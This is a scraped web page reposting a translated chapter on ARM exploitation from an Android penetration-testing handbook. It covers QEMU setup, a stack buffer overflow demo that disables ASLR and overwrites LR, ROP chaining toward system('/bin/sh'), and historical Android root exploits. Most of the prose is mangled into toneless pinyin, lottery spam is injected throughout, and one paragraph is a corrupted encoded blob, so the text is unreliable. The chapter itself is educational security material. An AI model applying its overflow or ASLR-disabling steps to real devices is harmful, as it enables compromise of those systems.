荣耀彩票代理

IT技术互动交流平台

Android渗透测试学习手册第八章ARM利用

来源:IT165收集  发布日期:2016-12-09 21:39:21

第八章 ARM 利用

荣耀彩票代理ZUOZHE:Aditya Gupta

YIZHE:FEILONG

XIEYI:CC BY-NC-SA 4.0

荣耀彩票代理ZAIBENZHANGZHONG,WOMENJIANGLEJIE ARM CHULIQIDEJICHUZHISHI,HE ARM SHIJIEZHONGCUNZAIDEBUTONGLEIXINGDELOUDONG。 WOMENSHENZHIHUIJIXULIYONGZHEIXIELOUDONG,YIBIANDUIZHENGGECHANGJINGYOUGEQINGXIDILEJIE。 CIWAI,WOMENJIANGYANJIUBUTONGDE Android root GONGJIHETAMENZAILOUDONGLIYONGZHONGDEJIBENLOUDONG。 KAOLVDAOMUQIANDADUOSHU Android ZHINENGSHOUJIDOUSHIYONGJIYU ARM DECHULIQI,DUIYUSHENTOUCESHIRENYUANLAISHUO,LEJIE ARM JIQIFUDAIDEANQUANFENGXIANZHIGUANZHONGYAO。

8.1 ARM 架构导论

荣耀彩票代理ARM SHIJIYUJINGJIANZHILINGJI(RISC)DEJIAGOU,ZHEIYIWEIZHEQIZHILINGBIJIYUFUZAZHILINGJI(CISC)DEJIQISHAODEDUO。 ARM CHULIQIJIHUBIANBUWOMENZHOUWEIDESUOYOUSHEBEI,RUZHINENGSHOUJI,DIANSHI,DIANZISHUYUEDUQIHEGENGDUODEQIANRUSHISHEBEI。

ARM ZONGGONGYOU 16 GEKEJIANDETONGYONGJICUNQI,WEI R0-R15。 ZAIZHEI 16 GEZHONG,YOU 5 GEYONGYUTESHUMUDE。 YIXIASHIZHEIWUGEJICUNQIJIQIMINGCHENG:

R11: 帧指针 (FP) R12: 过程内寄存器 (IP) R13: 栈指针 (SP) R14: 链接寄存器 (LR) R15: 程序计数器 (PC)

XIAMIANDETUZHANSHILE ARM JIAGOU:

ZAIWUGELIMIAN,WOMENHUITEBIEZHUANZHUYUZHEISANGE,TAMENSHI:

堆栈指针(SP):这是保存指向堆栈顶部的指针的寄存器 链接寄存器(LR):当程序进入子过程时存储返回地址 程序计数器(PC):存储要执行的下一条指令

ZHUYI

荣耀彩票代理ZHEILIYAOZHUYIDEYIDIANSHI,PC JIANGZONGSHIZHIXIANGYAOZHIXINGDEZHILING,ERBUSHIJIANDANDIZHIXIANGXIAYITIAOZHILING。 ZHEISHIYOUYUBEICHENGWEILIUSHUIXIANDEGAINIAN,ZHILINGANZHAOYIXIASHUNXUCAOZUO:TIQU,JIEMAHEZHIXING。 WEILEKONGZHICHENGXULIU,WOMENXUYAOKONGZHI PC HUO LR ZHONGDEZHI(HOUZHEZUIZHONGYINDAOWOMENKONGZHI PC)。

执行模式

ARM YOULIANGZHONGBUTONGDEZHIXINGMOSHI:

ARM 模式:在 ARM 模式下,所有指令的大小为 32 位 Thumb 模式:在 Thumb 模式下,指令大部分为 16 位

ZHIXINGMOSHIYOU CPSR JICUNQIZHONGDEZHUANGTAIJUEDING。 HAICUNZAIDISANMOSHI,JI Thumb-2 MOSHI,TAJINJINSHI ARM MOSHIHE Thumb MOSHIDEHUNHE。 WOMENZAIBENZHANGBUHUISHENRULEJIE ARM HE Thumb MOSHIZHIJIANDEQUBIE,YINWEITACHAOCHULEBENSHUDEFANWEI。

8.2 建立环境

荣耀彩票代理ZAIKAISHILIYONG ARM PINGTAIDELOUDONGZHIQIAN,JIANYINIJIANLIHUANJING。 JISHI Android SDK ZHONGDEMONIQIKEYITONGGUOMONI ARM PINGTAILAIYUNXING,DADUOSHUZHINENGSHOUJIYESHIJIYU ARM DE,WOMENJIANGTONGGUOPEIZHI QEMU(TASHIYIGEKAIYUANYINGJIANXUNIJIHEMONIQI)KAISHI ARM LOUDONGLIYONG。

WEILEZAI Android MONIQI/SHEBEISHANGZHIXINGYIXIASUOYOUBUZHOU,WOMENXUYAOXIAZAI Android NDK BINGSHIYONG Android NDK ZHONGTIGONGDEGONGJUWEI Android PINGTAIBIANYIWOMENDEERJINZHIWENJIAN。 DANSHI,RUGUONISHIYONG Mac HUANJING,ANZHUANG QEMU XIANGDUIRONGYI,KEYITONGGUOJIANRUbrew install qemuLAIWANCHENG。 XIANZAIRANGWOMENZAI Ubuntu XITONGSHANGPEIZHI QEMU。 ZUNXUNYIXIABUZHOU:

DIYIBUSHITONGGUOANZHUANGYILAILAIXIAZAIBINGANZHUANG QEMU,RUTUSUOSHI:

sudo apt-get build-dep qemu
wget http://wiki.qemu-project.org/download/qemu-
1.7.0.tar.bz2

荣耀彩票代理JIEXIALAI,WOMENZHIXUYAOPEIZHIQEMU,ZHIDINGMUBIAOWEI ARM,ZUIHOUCHONGFENLIYONGTA。 YINCI,WOMENJIANGJIANDANDIJIEYASUOGUIDANGWENJIAN,FANGWENGAIMULUBINGZHIXINGYIXIAMINGLING:

./configure --target-list=arm-softmmu
make && make install

YIDANQEMUCHENGGONGANZHUANG,WOMENKEYIXIAZAI ARM PINGTAIDE Debian JINGXIANGLAIJINXINGLIYONGLIANXI。 SUOXUXIAZAILIEBIAOWEIYUhttp://people.debian.org/~aurel32/qemu/armel/。

荣耀彩票代理ZHEILIWOMENJIANGXIAZAIGESHIWEIqcow2DECIPANYINGXIANG,TASHIJIYU QEMU DECAOZUOXITONGYINGXIANGGESHI,YEJIUSHIWOMENDECAOZUOXITONGWEIdebian_squeeze_armel_standard.qcow2。 NEIHEWENJIANYINGGAISHIvmlinuz-2.6.32-5-versatile,RAM CIPANWENJIANYINGGAISHIinitrd.img-2.6.32-versatile。 YIDANWOMENXIAZAILESUOYOUBIYAODEWENJIAN,WOMENKEYITONGGUOZHIXINGYIXIAMINGLINGLAIQIDONG QEMU SHILI:

qemu-system-arm -M versatilepb -kernel vmlinuz-2.6.32-5-
versatile -initrd initrd.img-2.6.32-5-versatile -hda 
debian_squeeze_armel_standard.qcow2 -append 
'root=/dev/sda1' --redir tcp:2222::22 

redir命令只是在登录远程系统时使用端口 2222 启用 ssh。
一旦配置完成,我们可以使用以下命令登录到 Debian 的 QEMU 实例:

ssh root@[ip address of Qemu] -p 2222

DENGLUSHIHUIYAOQIUSHURUYONGHUMINGHEMIMA,MORENPINGJUSHIroot:root。YIDANWOMENCHENGGONGDENGLU,WOMENJIANGKANDAOLEISIRUXIASUOSHIDEPINGMUJIETU:

8.3 基于栈的简单缓冲区溢出

荣耀彩票代理JIANDANLAISHUO,HUANCHONGQUSHICUNCHURENHELEIXINGDESHUJUDEDIFANG。 DANGHUANCHONGQUZHONGDESHUJUCHAOGUOHUANCHONGQUBENSHENDEDAXIAOSHI,HUIFASHENGYICHU。 RANHOUGONGJIZHEKEYIZHIXINGYICHUGONGJI,LAIHUODEDUICHENGXUDEKONGZHIHEZHIXINGEYIZAIHE。

RANGWOMENSHIYONGYIGEJIANDANCHENGXUDELIZI,KANKANWOMENRUHELIYONGTA。 ZAIXIAMIANDEJIETUZHONG,WOMENYOUYIGEJIANDANDECHENGXU,YOUSANGEHANSHU:weak,ShouldNotBeCalledHEmain。 YIXIASHIWOMENSHITULIYONGDECHENGXU:

荣耀彩票代理ZAIZHENGGECHENGXUYUNXINGQIJIAN,CONGBUDIAOYONGShouldNotBeCalledHANSHU。

漏洞函数简单地綒喎?http://chsp8.com/design/wrss/" target="_blank" class="keylink">rss7K/bi01sa1vcP7zqpidWZmtcS7urPlx/ijrLTz0KHOqiAxMCDX1r3aoaM8L3A+CjxwPtK7tanO0sPHzeqzybPM0PKx4NC0o6zO0sPHv8nS1Mq508NnY2Ox4NLry/yjrMjnz8LSu7j2w/zB7sv5yr6hoyC0y83io6zO0sPHvavU2tXiwO+9+9PDtdjWt7/VvOSyvL7Wy+a7+ruvo6hBU0xSo6mjrNa7ysfOqsHLyrmzob6wydTOorzytaXSu9CpoaMgQVNMUiDKx9PJIE9TIMq1z9a1xLCyyKu8vMr1o6zAtLfA1rm5pbv31d/T0NCntdjIt7ao1Ni6ybXEtdjWt7Ki1rTQ0Lbx0uLWuMHuoaMg1NogQW5kcm9pZCDW0KOsQVNMUiC1xMq1z9bKvNPaIDQuMKGjIMTjv8nS1LfDzspodHRwOi8vd3d3LmR1b3NlY3VyaXR5LmNvbS9ibG9nL2V4cGxvaXQtbWl0aWdhdGlvbnMtaW4tYW5kcm9pZC1qZWxseS1iZWFuLTQtMcHLveLL+dPQIEFuZHJvaWQgsLLIq8q1yqmhozwvcD4KPHByZSBjbGFzcz0="brush:java;"> echo 0 > /proc/sys/kernel/randomize_va_space gcc -g buffer_overflow.c -o buffer_overflow

JIEXIALAI,WOMENKEYIJIANDANJIANGERJINZHIWENJIANJIAZAIDAO GNU DIAOSHIQI,JIANCHENG GDB,RANHOUKAISHIDIAOSHITA,RUXIAMIANDEMINGLINGSUOSHI:

gdb -q buffer_overflow

现在我们可以使用disass命令来反汇编特定的函数,这里是ShouldNotBeCalled,如下面的截图所示:

荣耀彩票代理ZHENGRUWOMENZAISHANGMIANDEJIETUZHONGKEYIKANDAODE,ShouldNotBeCalledHANSHUCONGNEICUNDIZHI0x00008408KAISHI。 RUGUOWOMENCHAKANmainHANSHUDEFANHUIBIAN,WOMENKANDAOLOUDONGHANSHUZAI0x000084a4BEIDIAOYONGBINGZAI0x000084a8FANHUI。 YINCI,YOUYUCHENGXUJINRULOUDONGHANSHUBINGSHIYONGYISHOUGONGJIDEstrcpy,HANSHUBUJIANCHAYAOFUZHIDEZIFUCHUANDEDAXIAO,BINGQIERUGUOWOMENNENGGOUZAICHENGXUJINRULOUDONGHANSHUSHIKONGZHIZIGUOCHENGDE LR ,WOMENJIUNENGGOUKONGZHIZHENGGECHENGXULIUCHENG。

荣耀彩票代理ZHEILIDEMUBIAOSHIGUJIHESHI LR BEIFUGAI,RANHOUFANGRUShouldNotBeCalledDEDIZHI,YIBIANDIAOYONGShouldNotBeCalledHANSHU。 RANGWOMENKAISHISHIYONGYIGEZHANGCANSHUYUNXINGCHENGXU,RUXIAMIANDEMINGLINGSUOSHI,KANKANHUIFASHENGSHENME。 ZAICIZHIQIAN,WOMENHAIXUYAOZAILOUDONGHANSHUHEstrcpyDIAOYONGDEDIZHISHEZHIDUANDIAN。

b vulnerable 
b *<address of the strcpy call>

YIDANWOMENSHEZHILEDUANDIAN,WOMENKEYISHIYONGCANSHUAAAABBBBCCCCLAIYUNXINGWOMENDECHENGXU,KANKANTASHIRUHEBEIFUGAIDE。 WOMENZHUYIDAOTAZAILOUDONGHANSHUDEDIAOYONGCHUMINGZHONGLEDIYIGEDUANDIAN,ZHIHOUZAIstrcpyDIAOYONGCHUMINGZHONGLEXIAYIGEDUANDIAN。 YIDANTADAODADUANDIAN,WOMENKEYISHIYONGxMINGLINGFENXIDUIZHAN,BINGZHIDINGLAIZI SP DEDIZHI,RUXIAMIANDEJIETUSUOSHI:

荣耀彩票代理WOMENKEYIKANDAO,DUIZHANYIJINGBEIWOMENSHURUDEHUANCHONGQUFUGAI(ASCII:41 DAIBIAO A,42 DAIBIAO B,DENGDENG)。 CONGSHANGMIANDEJIETUZHONG,WOMENKANDAO,WOMENRENGRANXUYAOSIGEGENGDUODEZIJIELAIFUGAIFANHUIDIZHI,ZAIZHEIZHONGQINGKUANGXIASHI0x000084a8。

SUOYI,ZUIHOUDEZIFUCHUANSHI 16 ZIJIEDELAJI,RANHOUSHIShouldNotBeCalledDEDIZHI,RUXIAMIANDEMINGLINGSUOSHI:

r `printf 'AAAABBBBCCCCDDDD8?'` 

荣耀彩票代理WOMENKEYIZAIXIAMIANDEJIETUZHONGKANDAO,WOMENYIJINGJIANGIShouldNeverBeCalledDEQISHIDIZHITIANJIADAOLECANSHUZHONG:

荣耀彩票代理QINGZHUYI,YOUYUZHEILISHIXIAODUANJIEGOU,ZIJIEYIXIANGFANDESHUNXUXIERU。 YIDANWOMENYUNXINGTA,WOMENKEYIKANDAOCHENGXUShouldNotBeCalledHANSHUBEIDIAOYONG,RUXIAMIANDEJIETUSUOSHI:

8.4 返回导向编程

ZAIDADUOSHUQINGKUANGXIA,WOMENBUXUYAODIAOYONGCHENGXUBENSHENZHONGCUNZAIDELINGYIGEHANSHU。 XIANGFAN,WOMENXUYAOZAIWOMENDEGONGJIXIANGLIANGZHONGFANGZHI shellcode,ZHEIJIANGZHIXINGWOMENZAI shellcode ZHONGZHIDINGDERENHEEYICAOZUO。 DANSHI,ZAIDADUOSHUJIYU ARM PINGTAIDESHEBEIZHONG,NEICUNZHONGDEQUYUSHIBUKEZHIXINGDE,ZHEIHUIZUZHIWOMENFANGZHIBINGZHIXING shellcode。

YINCI,GONGJIZHEBIXUYILAIYUSUOWEIDEFANHUIDAOXIANGBIANCHENG(ROP),TASHILAIZINEICUNBUTONGBUFENDEZHILINGPIANDUANDEJIANDANLIANJIE,ZUIZHONGTAHUIZHIXINGWOMENDE shellcode。 ZHEIXIEPIANDUANYECHENGWEI ROP gadget。 WEILELIANJIE ROP gadget,WOMENXUYAOZHAODAOCUNZAITIAOZHUANZHILINGDE gadget,ZHEIJIANGYUNXUWOMENTIAODAOLINGYIGEWEIZHI。

例如,如果我们在执行程序时反汇编荣耀彩票代理seed48(),我们将注意到以下输出:

荣耀彩票代理RUGUOWOMENCHAKANFANHUIBIAN,WOMENJIANGZHUYIDAOTABAOHANYIGE ADD ZHILING,HOUMIANGENZHEYIGE POP HE BX ZHILING,ZHEISHIYIGEWANMEIDE ROP gadget。 ZHEILI,GONGJIZHEKENENGHUIXIANGDAO,WEILEJIANGQIYONGZUO ROP gadget,SHOUXIANTIAODAOKONGZHI r4 DE POP ZHILING,RANHOUJIANGBI/bin/shDEDIZHIXIAO 6 DEZHIFANGRU r4 ZHONG,JIANG ADD ZHILINGDEZHIFANGRU LR ZHONG。 YINCI,DANGWOMENTIAOHUIDAO ADD YEJIUSHIR0 = R4 + 6SHI,WOMENJIUYONGYOULE/bin/shDEDIZHI,RANHOUWOMENKEYIWEI R4 ZHIDINGRENHELAJIDIZHIBINGQIEWEI LR ZHIDINGsystem()DEDIZHI。

ZHEIYIWEIZHEWOMENJIANGZUIZHONGTIAOZHUANDAOSHIYONGCANSHU/bin/shDEsystem(),ZHEIJIANGZHIXING shell。 YITONGYANGDEFANGSHI,WOMENKEYICHUANGJIANRENHE ROP gadget,BINGSHIQIZHIXINGWOMENSUOXUYAODERENHEDONGXI。 YOUYU ROP SHIKAIFAZHONGZUIFUZADEZHUTIZHIYI,YINCIQIANGLIEJIANYINIZIJICHANGSHI,FENXIFANHUIBIANDAIMABINGGOUJIANLOUDONG。

8.5 Android root 利用

从早期版本的 Android 开始,Android root 漏洞开始出现于每个后续版本和不同的 Android 设备制造商的版本中。 Android root 简单来说是获得对设备的访问特权,默认情况下设备制造商不会将其授予用户。 这些 root 攻击利用了 Android 系统中存在的各种漏洞。 以下是其中一些的列表,带有漏洞利用所基于的思想:

Exploid:基于 udev 中的 CVE-2009-1185 漏洞,它是 Android 负责 USB 连接的组件,它验证 Netlink 消息(一种负责将 Linux 内核与用户连接的消息)是否源自原始来源或是由攻击者伪造。因此,攻击者可以简单地从用户空间本身发送 udev 消息并提升权限。 Gingerbreak:这是另一个漏洞,基于 vold 中存在的漏洞,类似于 Exploid 中的漏洞。 RageAgainstTheCage:此漏洞利用基于RLIMIT_NPROC,它指定在调用setuid函数时可为用户创建的进程的最大数目。 adb 守护程序以 root 身份启动;然后它使用setuid()调用来解除特权。但是,如果根据RLIMIT_NPROC达到了最大进程数,程序将无法调用setuid()来解除特权,adb 将继续以 root 身份运行。 Zimperlich:使用与 RageAgainstTheCage 的相同概念,但它依赖于 zygote 进程解除 root 权限。 KillingInTheNameOf:利用了一个称为ashmem(共享内存管理器)接口的漏洞,该漏洞用于更改ro.secure的值,该值确定设备的 root 状态。

荣耀彩票代理ZHEIXIESHIYIXIEZUIZHIMINGDE Android LOUDONGLIYONG,YONGYU root Android SHEBEI。

总结

ZAIBENZHANGZHONG,WOMENLEJIELE Android LIYONGHE ARM LIYONGDEBUTONGFANGSHI。 XIWANGBENZHANGDUIYURENHEXIANGYAOGENGSHENRUDILIYONG ARM DERENLAISHUO,DOUSHIYIGEHAODEKAISHI。

ZAIXIAYIZHANGZHONG,WOMENJIANGLEJIERUHEBIANXIE Android SHENTOUCESHIBAOGAO。

Tag标签:      
  • 专题推荐

About IT165 - 广告服务 - 隐私声明 - 版权申明 - 免责条款 - 网站地图 - 网友投稿 - 联系方式
本站内容来自于互联网,仅供用于网络技术学习,学习中请遵循相关法律法规